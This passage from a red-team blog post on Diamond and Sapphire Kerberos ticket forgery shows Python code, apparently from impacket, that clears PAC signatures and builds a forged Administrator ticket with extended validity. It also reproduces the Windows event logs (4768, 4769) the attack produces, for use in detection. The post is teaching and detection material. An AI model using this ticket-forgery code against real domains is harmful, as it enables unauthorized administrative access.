            <span class="n">pacType</span> <span class="o">=</span> <span class="n">pac</span><span class="p">.</span><span class="n">PACTYPE</span><span class="p">(</span><span class="n">adIfRelevant</span><span class="p">[</span><span class="mi">0</span><span class="p">][</span><span class="s">'ad-data'</span><span class="p">].</span><span class="n">asOctets</span><span class="p">())</span>
            <span class="n">pacInfos</span> <span class="o">=</span> <span class="nb">dict</span><span class="p">()</span>
            <span class="n">buff</span> <span class="o">=</span> <span class="n">pacType</span><span class="p">[</span><span class="s">'Buffers'</span><span class="p">]</span>

            <span class="c1"># clearing the signatures so that we can sign&amp;encrypt later on
</span>            <span class="n">logging</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"</span><span class="se">\t</span><span class="s">Clearing signatures"</span><span class="p">)</span>
            <span class="k">for</span> <span class="n">bufferN</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">pacType</span><span class="p">[</span><span class="s">'cBuffers'</span><span class="p">]):</span>
                <span class="n">infoBuffer</span> <span class="o">=</span> <span class="n">pac</span><span class="p">.</span><span class="n">PAC_INFO_BUFFER</span><span class="p">(</span><span class="n">buff</span><span class="p">)</span>
                <span class="n">data</span> <span class="o">=</span> <span class="n">pacType</span><span class="p">[</span><span class="s">'Buffers'</span><span class="p">][</span><span class="n">infoBuffer</span><span class="p">[</span><span class="s">'Offset'</span><span class="p">]</span> <span class="o">-</span> <span class="mi">8</span><span class="p">:][:</span><span class="n">infoBuffer</span><span class="p">[</span><span class="s">'cbBufferSize'</span><span class="p">]]</span>
                <span class="n">buff</span> <span class="o">=</span> <span class="n">buff</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">infoBuffer</span><span class="p">):]</span>
                <span class="k">if</span> <span class="n">infoBuffer</span><span class="p">[</span><span class="s">'ulType'</span><span class="p">]</span> <span class="ow">in</span> <span class="p">[</span><span class="n">PAC_SERVER_CHECKSUM</span><span class="p">,</span> <span class="n">PAC_PRIVSVR_CHECKSUM</span><span class="p">]:</span>
                    <span class="n">checksum</span> <span class="o">=</span> <span class="n">PAC_SIGNATURE_DATA</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
                    <span class="k">if</span> <span class="n">checksum</span><span class="p">[</span><span class="s">'SignatureType'</span><span class="p">]</span> <span class="o">==</span> <span class="n">ChecksumTypes</span><span class="p">.</span><span class="n">hmac_sha1_96_aes256</span><span class="p">.</span><span class="n">value</span><span class="p">:</span>
                        <span class="n">checksum</span><span class="p">[</span><span class="s">'Signature'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">12</span>
                    <span class="k">elif</span> <span class="n">checksum</span><span class="p">[</span><span class="s">'SignatureType'</span><span class="p">]</span> <span class="o">==</span> <span class="n">ChecksumTypes</span><span class="p">.</span><span class="n">hmac_sha1_96_aes128</span><span class="p">.</span><span class="n">value</span><span class="p">:</span>
                        <span class="n">checksum</span><span class="p">[</span><span class="s">'Signature'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">12</span>
                    <span class="k">else</span><span class="p">:</span>
                        <span class="n">checksum</span><span class="p">[</span><span class="s">'Signature'</span><span class="p">]</span> <span class="o">=</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="mi">16</span>
                    <span class="n">pacInfos</span><span class="p">[</span><span class="n">infoBuffer</span><span class="p">[</span><span class="s">'ulType'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">checksum</span><span class="p">.</span><span class="n">getData</span><span class="p">()</span>
                <span class="k">else</span><span class="p">:</span>
                    <span class="n">pacInfos</span><span class="p">[</span><span class="n">infoBuffer</span><span class="p">[</span><span class="s">'ulType'</span><span class="p">]]</span> <span class="o">=</span> <span class="n">data</span>
<span class="p">[...]</span>
<span class="n">newFlags</span> <span class="o">=</span> <span class="p">[</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">forwardable</span><span class="p">.</span><span class="n">value</span><span class="p">,</span> <span class="n">TicketFlags</span><span class="p">.</span><span class="n">proxiable</span><span class="p">.</span><span class="n">value</span><span class="p">,</span> <span class="n">TicketFlags</span><span class="p">.</span><span class="n">renewable</span><span class="p">.</span><span class="n">value</span><span class="p">,</span> <span class="n">TicketFlags</span><span class="p">.</span><span class="n">pre_authent</span><span class="p">.</span><span class="n">value</span><span class="p">]</span>
<span class="p">[...]</span>
<span class="k">else</span><span class="p">:</span>
            <span class="n">encTicketPart</span> <span class="o">=</span> <span class="n">EncTicketPart</span><span class="p">()</span>

            <span class="n">flags</span> <span class="o">=</span> <span class="nb">list</span><span class="p">()</span>
            <span class="n">flags</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">forwardable</span><span class="p">.</span><span class="n">value</span><span class="p">)</span>
            <span class="n">flags</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">proxiable</span><span class="p">.</span><span class="n">value</span><span class="p">)</span>
            <span class="n">flags</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">renewable</span><span class="p">.</span><span class="n">value</span><span class="p">)</span>
            <span class="k">if</span> <span class="bp">self</span><span class="p">.</span><span class="n">__domain</span> <span class="o">==</span> <span class="bp">self</span><span class="p">.</span><span class="n">__server</span><span class="p">:</span>
                <span class="n">flags</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">initial</span><span class="p">.</span><span class="n">value</span><span class="p">)</span>
            <span class="n">flags</span><span class="p">.</span><span class="n">append</span><span class="p">(</span><span class="n">TicketFlags</span><span class="p">.</span><span class="n">pre_authent</span><span class="p">.</span><span class="n">value</span><span class="p">)</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'flags'</span><span class="p">]</span> <span class="o">=</span> <span class="n">encodeFlags</span><span class="p">(</span><span class="n">flags</span><span class="p">)</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keytype'</span><span class="p">]</span> <span class="o">=</span> <span class="n">kdcRep</span><span class="p">[</span><span class="s">'ticket'</span><span class="p">][</span><span class="s">'enc-part'</span><span class="p">][</span><span class="s">'etype'</span><span class="p">]</span>

            <span class="k">if</span> <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keytype'</span><span class="p">]</span> <span class="o">==</span> <span class="n">EncryptionTypes</span><span class="p">.</span><span class="n">aes128_cts_hmac_sha1_96</span><span class="p">.</span><span class="n">value</span><span class="p">:</span>
                <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keyvalue'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_letters</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">16</span><span class="p">)])</span>
            <span class="k">elif</span> <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keytype'</span><span class="p">]</span> <span class="o">==</span> <span class="n">EncryptionTypes</span><span class="p">.</span><span class="n">aes256_cts_hmac_sha1_96</span><span class="p">.</span><span class="n">value</span><span class="p">:</span>
                <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keyvalue'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_letters</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">32</span><span class="p">)])</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'key'</span><span class="p">][</span><span class="s">'keyvalue'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="n">random</span><span class="p">.</span><span class="n">choice</span><span class="p">(</span><span class="n">string</span><span class="p">.</span><span class="n">ascii_letters</span><span class="p">)</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">16</span><span class="p">)])</span>

            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'crealm'</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__domain</span><span class="p">.</span><span class="n">upper</span><span class="p">()</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'cname'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'cname'</span><span class="p">][</span><span class="s">'name-type'</span><span class="p">]</span> <span class="o">=</span> <span class="n">PrincipalNameType</span><span class="p">.</span><span class="n">NT_PRINCIPAL</span><span class="p">.</span><span class="n">value</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'cname'</span><span class="p">][</span><span class="s">'name-string'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'cname'</span><span class="p">][</span><span class="s">'name-string'</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="p">.</span><span class="n">__target</span>

            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'transited'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'transited'</span><span class="p">][</span><span class="s">'tr-type'</span><span class="p">]</span> <span class="o">=</span> <span class="mi">0</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'transited'</span><span class="p">][</span><span class="s">'contents'</span><span class="p">]</span> <span class="o">=</span> <span class="s">''</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authtime'</span><span class="p">]</span> <span class="o">=</span> <span class="n">KerberosTime</span><span class="p">.</span><span class="n">to_asn1</span><span class="p">(</span><span class="n">datetime</span><span class="p">.</span><span class="n">datetime</span><span class="p">.</span><span class="n">utcnow</span><span class="p">())</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'starttime'</span><span class="p">]</span> <span class="o">=</span> <span class="n">KerberosTime</span><span class="p">.</span><span class="n">to_asn1</span><span class="p">(</span><span class="n">datetime</span><span class="p">.</span><span class="n">datetime</span><span class="p">.</span><span class="n">utcnow</span><span class="p">())</span>
            <span class="c1"># Let's extend the ticket's validity a lil bit
</span>            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'endtime'</span><span class="p">]</span> <span class="o">=</span> <span class="n">KerberosTime</span><span class="p">.</span><span class="n">to_asn1</span><span class="p">(</span><span class="n">ticketDuration</span><span class="p">)</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'renew-till'</span><span class="p">]</span> <span class="o">=</span> <span class="n">KerberosTime</span><span class="p">.</span><span class="n">to_asn1</span><span class="p">(</span><span class="n">ticketDuration</span><span class="p">)</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authorization-data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authorization-data'</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authorization-data'</span><span class="p">][</span><span class="mi">0</span><span class="p">][</span><span class="s">'ad-type'</span><span class="p">]</span> <span class="o">=</span> <span class="n">AuthorizationDataType</span><span class="p">.</span><span class="n">AD_IF_RELEVANT</span><span class="p">.</span><span class="n">value</span>
            <span class="n">encTicketPart</span><span class="p">[</span><span class="s">'authorization-data'</span><span class="p">][</span><span class="mi">0</span><span class="p">][</span><span class="s">'ad-data'</span><span class="p">]</span> <span class="o">=</span> <span class="n">noValue</span>
<span class="p">[...]</span>
</pre></table></code></div></div><h1 id="events">Events</h1><p>The DC generates the following events.</p><p>Firt the authentication one because of AS_REQ, Event ID <strong>4768</strong>.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
</pre><td class="rouge-code"><pre>A Kerberos authentication ticket (TGT) was requested.

Account Information:
	Account Name:		Administrator
	Supplied Realm Name:	CONTOSO
	User ID:			CONTOSO\Administrator

Service Information:
	Service Name:		krbtgt
	Service ID:		CONTOSO\krbtgt

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810010
	Result Code:		0x0
	Ticket Encryption Type:	0x12
	Pre-Authentication Type:	2

Certificate Information:
	Certificate Issuer Name:		
	Certificate Serial Number:	
	Certificate Thumbprint:		

Certificate information is only provided if a certificate was used for pre-authentication.

Pre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.
</pre></table></code></div></div><p>And it is followed inmediatly by a Event ID <strong>4769</strong> because TGS_REQ using S42Self+U2U is inmediately performed to request the ST.</p><div class="language-plaintext highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
</pre><td class="rouge-code"><pre>A Kerberos service ticket was requested.

Account Information:
	Account Name:		Administrator@CONTOSO.LOCAL
	Account Domain:		CONTOSO.LOCAL
	Logon GUID:		{1d74b519-9c12-df9d-0834-823dc4d8e26b}

Service Information:
	Service Name:		DC-01$
	Service ID:		CONTOSO\DC-01$

Network Information:
	Client Address:		::1
	Client Port:		0

Additional Information:
	Ticket Options:		0x40810000
	Ticket Encryption Type:	0x12
	Failure Code:		0x0
	Transited Services:	-

This event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.

This event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.

Ticket options, encryption types, and failure codes are defined in RFC 4120.
</pre></table></code></div></div><p>As you can see, the account is Administrator and the service is the computer account of the KDC. Remeber that we did not specified a SPN, we used a Username in the <em>sname</em> field.</p><p>Now, blue teamers investigate more and create a Sigma Rule :P</p><h1 id="references">References:</h1><ol><li><a href="https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/">https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/</a><li><a href="https://learn.microsoft.com/es-es/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9">https://learn.microsoft.com/es-es/openspecs/windows_protocols/ms-kile/2a32282e-dd48-4ad9-a542-609804b02cc9</a><li><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/dd302fd1-0aa7-406b-ad91-2a6b35738557">https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/dd302fd1-0aa7-406b-ad91-2a6b35738557</a><li><a href="https://github.com/ShutdownRepo/The-Hacker-Recipes/blob/master/ad/movement/kerberos/forged-tickets/diamond.md">https://github.com/ShutdownRepo/The-Hacker-Recipes/blob/master/ad/movement/kerberos/forged-tickets/diamond.md</a><li><a href="https://github.com/ShutdownRepo/The-Hacker-Recipes/blob/master/ad/movement/kerberos/forged-tickets/sapphire.md">https://github.com/ShutdownRepo/The-Hacker-Recipes/blob/master/ad/movement/kerberos/forged-tickets/sapphire.md</a><li><a href="https://github.com/SecureAuthCorp/impacket/pull/1411">https://github.com/SecureAuthCorp/impacket/pull/1411</a><li><a href="https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L518">https://github.com/ShutdownRepo/impacket/blob/sapphire-tickets/examples/ticketer.py#L518</a><li><a href="https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/kerberos#decrypt-krb5-traffic">https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/kerberos#decrypt-krb5-traffic</a><li><a href="https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7">https://medium.com/tenable-techblog/decrypt-encrypted-stub-data-in-wireshark-deb132c076e7</a><li><a href="https://www.tarlogic.com/es/blog/como-funciona-kerberos/">https://www.tarlogic.com/es/blog/como-funciona-kerberos/</a><li><a href="https://www.thehacker.recipes/ad/movement/kerberos">https://www.thehacker.recipes/ad/movement/kerberos</a><li><a href="http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0001/kerberos/ref/kerberos-faq.html#u2uauth">http://www.di-srv.unisa.it/~ads/corso-security/www/CORSO-0001/kerberos/ref/kerberos-faq.html#u2uauth</a><li><a href="https://twitter.com/snovvcrash/status/1576640678410432512">https://twitter.com/snovvcrash/status/1576640678410432512</a><li><a href="https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13">https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/02636893-7a1f-4357-af9a-b672e3e3de13</a><li><a href="https://medium.com/@robert.broeckelmann/kerberos-wireshark-captures-a-windows-login-example-151fabf3375a">https://medium.com/@robert.broeckelmann/kerberos-wireshark-captures-a-windows-login-example-151fabf3375a</a></ol></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/en/'>en</a>, <a href='/categories/windows-security/'>Windows security</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/windows/" class="post-tag no-text-decoration" >windows</a> <a href="/tags/cybersecurity/" class="post-tag no-text-decoration" >cybersecurity</a> <a href="/tags/kerberos/" class="post-tag no-text-decoration" >kerberos</a> <a href="/tags/red-team/" class="post-tag no-text-decoration" >red team</a> <a href="/tags/pentesting/" class="post-tag no-text-decoration" >pentesting</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Diamond And Sapphire Tickets - Peter Gabaldon&url=https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Diamond And Sapphire Tickets - Peter Gabaldon&u=https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Diamond And Sapphire Tickets - Peter Gabaldon&url=https://petergabaldon.github.io/posts/Diamond-And-Sapphire-Tickets/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/FortiGate-VPN-SSL-Honeypot/">FortiGate VPN-SSL Honeypot</a><li><a href="/posts/Bypass-Azure-Admin-Approval-Mode-Enumeration/">Bypass Azure Admin Approval Mode for User Consent Workflow When Enumerating</a><li><a href="/posts/Finding-TeamViewer-0days-Part-1/">Finding TeamViewer 0days - Part I</a><li><a href="/posts/Finding-TeamViewer-0days-Part-3/">Finding TeamViewer 0days - Part III</a><li><a href="/posts/Diamond-And-Sapphire-Tickets/">Diamond And Sapphire Tickets</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/cybersecurity/">cybersecurity</a> <a class="post-tag" href="/tags/pentesting/">pentesting</a> <a class="post-tag" href="/tags/red-team/">red team</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/cve-2024-7479/">CVE-2024-7479</a> <a class="post-tag" href="/tags/cve-2024-7481/">CVE-2024-7481</a> <a class="post-tag" href="/tags/kerberos/">kerberos</a> <a class="post-tag" href="/tags/tv-2024-1006/">tv-2024-1006</a> <a class="post-tag" href="/tags/zdi-24-1289/">ZDI-24-1289</a> <a class="post-tag" href="/tags/zdi-24-1290/">ZDI-24-1290</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/Playing-With-Windows-Security-Part-2/"><div class="card-body"> <span class="timeago small" > Feb 21, 2021 <i class="unloaded">2021-02-21T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Playing With Windows Security - Part 2</h3><div class="text-muted small"><p> Kerberos Authentication Protocol After the first part at which we talked about authentication in Windows and explained how attacks like Pass-The-Hash works. At this part we are going to analyse Ke...</p></div></div></a></div><div class="card"> <a href="/posts/Playing-With-Windows-Security-Part-1/"><div class="card-body"> <span class="timeago small" > Feb 4, 2021 <i class="unloaded">2021-02-04T00:00:00+01:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Playing With Windows Security - Part 1</h3><div class="text-muted small"><p> Windows Authentication. In this first part of Windows hacking we will be covering aspects related on how Windows authentication works. I’m coming from Linux ecosystem so sometimes I will try to co...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/Playing-With-Windows-Security-Part-2/" class="btn btn-outline-primary"><p>Playing With Windows Security - Part 2</p></a> <span class="btn btn-outline-primary disabled"><p>-</p></span></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('.post-content img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2026 <a href="https://twitter.com/PeterGabaldon">Pedro Gabaldon</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/cybersecurity/">cybersecurity</a> <a class="post-tag" href="/tags/pentesting/">pentesting</a> <a class="post-tag" href="/tags/red-team/">red team</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/cve-2024-7479/">CVE 2024 7479</a> <a class="post-tag" href="/tags/cve-2024-7481/">CVE 2024 7481</a> <a class="post-tag" href="/tags/kerberos/">kerberos</a> <a class="post-tag" href="/tags/tv-2024-1006/">tv 2024 1006</a> <a class="post-tag" href="/tags/zdi-24-1289/">ZDI 24 1289</a> <a class="post-tag" href="/tags/zdi-24-1290/">ZDI 24 1290</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://petergabaldon.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
